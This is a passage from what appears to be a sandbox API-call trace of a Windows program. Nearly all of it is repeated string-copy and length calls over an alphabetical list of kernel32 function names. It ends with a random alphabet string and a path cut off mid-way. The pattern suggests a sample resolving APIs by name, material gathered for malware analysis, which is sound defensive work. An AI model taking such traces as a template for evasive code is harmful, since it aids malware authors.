(lpString="CREATECONSOLESCREENBUFFER") returned 25 [0084.579] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0084.579] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0084.579] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0084.579] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0084.579] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0084.579] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0084.579] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0084.579] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0084.579] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0084.579] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0084.580] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0084.580] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0084.580] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0084.580] lstrlenA (lpString="CREATEEVENTA") returned 12 [0084.580] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0084.580] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0084.580] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0084.580] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0084.580] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0084.580] lstrlenA (lpString="CREATEEVENTW") returned 12 [0084.580] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0084.580] lstrlenA (lpString="CREATEFIBER") returned 11 [0084.580] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0084.580] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0084.580] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0084.580] lstrlenA (lpString="CREATEFILEA") returned 11 [0084.580] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0084.580] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0084.580] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0084.580] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0084.580] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0084.580] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0084.580] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0084.580] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0084.580] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0084.581] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0084.581] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0084.581] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0084.581] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0084.581] lstrlenA (lpString="CREATEFILEW") returned 11 [0084.581] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0084.581] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0084.581] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0084.581] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0084.581] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0084.581] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0084.581] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0084.581] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0084.581] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0084.581] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0084.581] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0084.581] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0084.581] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0084.581] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0084.581] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0084.581] lstrlenA (lpString="CREATEJOBSET") returned 12 [0084.581] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0084.581] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0084.581] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0084.581] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0084.581] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0084.581] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0084.581] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0084.581] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0084.581] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0084.581] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0084.581] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0084.581] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0084.581] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0084.581] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0084.581] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0084.581] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0084.582] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0084.582] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0084.582] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0084.582] lstrlenA (lpString="CREATEPIPE") returned 10 [0084.582] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0084.582] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0084.582] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0084.582] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0084.582] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0084.582] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0084.582] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0084.582] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0084.582] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0084.582] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0084.582] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0084.582] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0084.582] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0084.582] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0084.582] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0084.582] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0084.582] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0084.582] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0084.582] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0084.582] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0084.582] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0084.582] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0084.582] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0084.582] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0084.582] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0084.582] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0084.582] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0084.582] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0084.582] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0084.582] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0084.582] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0084.582] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0084.582] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0084.582] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0084.583] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0084.583] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0084.583] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0084.583] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0084.583] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0084.583] lstrlenA (lpString="CREATETHREAD") returned 12 [0084.583] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0084.583] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0084.583] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0084.583] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0084.583] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0084.583] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0084.583] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0084.583] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0084.583] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0084.583] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0084.583] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0084.583] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0084.583] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0084.583] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0084.583] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0084.583] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0084.583] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0084.583] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0084.583] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0084.583] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0084.583] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0084.583] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0084.583] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0084.583] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0084.583] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0084.583] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0084.583] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0084.583] lstrlenA (lpString="CTRLROUTINE") returned 11 [0084.583] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0084.583] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0084.583] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0084.584] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0084.584] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0084.584] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0084.584] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0084.584] lstrlenA (lpString="DEBUGBREAK") returned 10 [0084.584] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0084.584] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0084.584] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0084.584] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0084.584] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0084.584] lstrlenA (lpString="DECODEPOINTER") returned 13 [0084.584] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0084.584] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0084.584] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0084.584] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0084.584] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0084.584] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0084.584] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0084.584] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0084.584] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0084.584] lstrlenA (lpString="DELETEATOM") returned 10 [0084.584] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0084.584] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0084.584] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0084.584] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0084.584] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0084.584] lstrlenA (lpString="DELETEFIBER") returned 11 [0084.584] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0084.584] lstrlenA (lpString="DELETEFILEA") returned 11 [0084.584] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0084.584] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0084.584] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0084.584] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0084.584] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0084.584] lstrlenA (lpString="DELETEFILEW") returned 11 [0084.584] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0084.584] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0084.584] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0084.585] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0084.585] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0084.585] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0084.585] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0084.585] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0084.585] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0084.585] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0084.585] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0084.585] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0084.585] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0084.585] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0084.585] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0084.585] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0084.585] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0084.585] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0084.585] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0084.585] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0084.585] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0084.585] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0084.585] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0084.585] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0084.585] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0084.585] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0084.585] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0084.585] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0084.585] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0084.585] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0084.585] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0084.585] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0084.585] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0084.585] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0084.585] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0084.585] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0084.585] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0084.585] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0084.585] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0084.586] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0084.586] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0084.586] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0084.586] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0084.586] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0084.586] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0084.586] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0084.586] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0084.586] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0084.586] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0084.586] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0084.586] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0084.586] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0084.586] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0084.586] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0084.586] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0084.586] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0084.586] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0084.586] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0084.586] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0084.586] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0084.586] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0084.586] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0084.586] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0084.586] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0084.586] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0084.586] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0084.586] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0084.586] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0084.587] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS 